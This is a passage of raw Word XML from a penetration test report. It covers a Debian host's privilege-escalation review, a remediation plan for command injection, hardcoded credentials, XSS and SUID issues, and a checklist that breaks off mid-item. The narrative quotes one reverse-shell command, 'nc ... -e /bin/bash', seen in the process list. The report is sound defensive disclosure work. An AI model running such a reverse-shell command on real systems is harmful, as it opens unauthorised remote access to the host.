            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1897AF63" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E30188C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Debian GNU/Linux 10 (buster)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="17013EC4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="059BCC49" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44F8C743" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>debian</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="6EFA41AC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25D1AE7C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="781F973F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Linux 4.19.0-14-amd64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="0D0B03BD" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11B65202" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privilege Escalation Attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A74C735" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Investigated via SUID binary execution — not successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="6E66A863" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A9B2812" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Writable SUID Binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D5D4682" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/home/defender/Downloads</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.shelf</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — identified, not successfully leveraged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="437D8A90" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7356E2E3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cron Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="674B014B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> directories (/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cron.daily</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cron.hourly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">) enumerated; no writable root-executed </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> path identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="3DE1ACDC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42399ADE" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Root Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36F70759" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NOT demonstrated during this engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15B1515C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00C64CEA">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8AFD4E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From the www-data reverse shell foothold, the tester enumerated running processes, system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configuration, and file permissions across the host and the defender user's home directory. The reverse-shell process itself was visible in the process list (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -c nc 192.168.76.128 4444 -e /bin/bash), confirming persistence of the foothold during testing. A world-writable, SUID-set binary was located and is documented in F-07; no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job executing as root was found to be writable by www-data, and no other misconfigured SUID/SGID system binary was identified beyond standard OS binaries. No SSH keys or additional readable credential material were found under the defender home directory during this review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45246CBB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9. Remediation Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216C2225" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendations are grouped by priority to support practical remediation planning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C66A19C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
        </w:rPr>
        <w:t>Immediate (Critical / High severity — address before any further exposure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1852B20B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediate the OS command injection vulnerability in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>feedback.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: remove direct shell execution of user input; validate/allow-list input; avoid shell invocation entirely where possible (F-03).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378517B4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove hardcoded credentials from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and replace with credential validation against a securely hashed store (F-02).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EB27B7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce server-side authentication/session checks on the admin/profile page and all similarly protected pages (F-05).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F4A5B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove the SUID bit and restrict </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permissions on /home/defender/Downloads</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>; audit the host for other similarly misconfigured binaries (F-07).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B46BB6" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B45309"/>
        </w:rPr>
        <w:t>Short Term (Medium severity — address in the next remediation cycle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7994F91C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Disable anonymous FTP access and remove sensitive files (e.g., webpass.txt) from any publicly/anonymously reachable location (F-01).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632598C3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply contextual output encoding to the status parameter in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>contact.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (and audit other endpoints for the same pattern) to remediate reflected XSS (F-06).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346258C4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Restrict MySQL network exposure to only the hosts/networks that require it (F-08).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF42E92" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="047857"/>
        </w:rPr>
        <w:t>Long Term (Hardening and defense-in-depth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AB68F0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Apply the principle of least privilege across application service accounts, file permissions, and database grants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E5871E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Introduce a Web Application Firewall (WAF) and Content-Security-Policy (CSP) headers as compensating and defense-in-depth controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7D7220" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Establish a regular patch/upgrade cadence for the OS and all installed packages, and periodically re-test the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26900281" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Adopt a secure software development lifecycle (SSDLC) practice, including code review and static analysis, to catch hardcoded secrets and injection-prone patterns before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBCD046" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Implement centralized logging and monitoring to detect anomalous authentication, command execution, or file-access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8EFD39" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Final Remediation Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B954DD9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Disable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> anonymous FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D84503" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Remove</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sensitive/password files from public or anonymous services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DC735C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Remove</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hardcoded credentials from application source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C426026" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Implement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password hashing and proper authentication/session management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096F4F79" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Validate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and sanitize all input passed to system-level command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E489B3E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Replace</w:t>
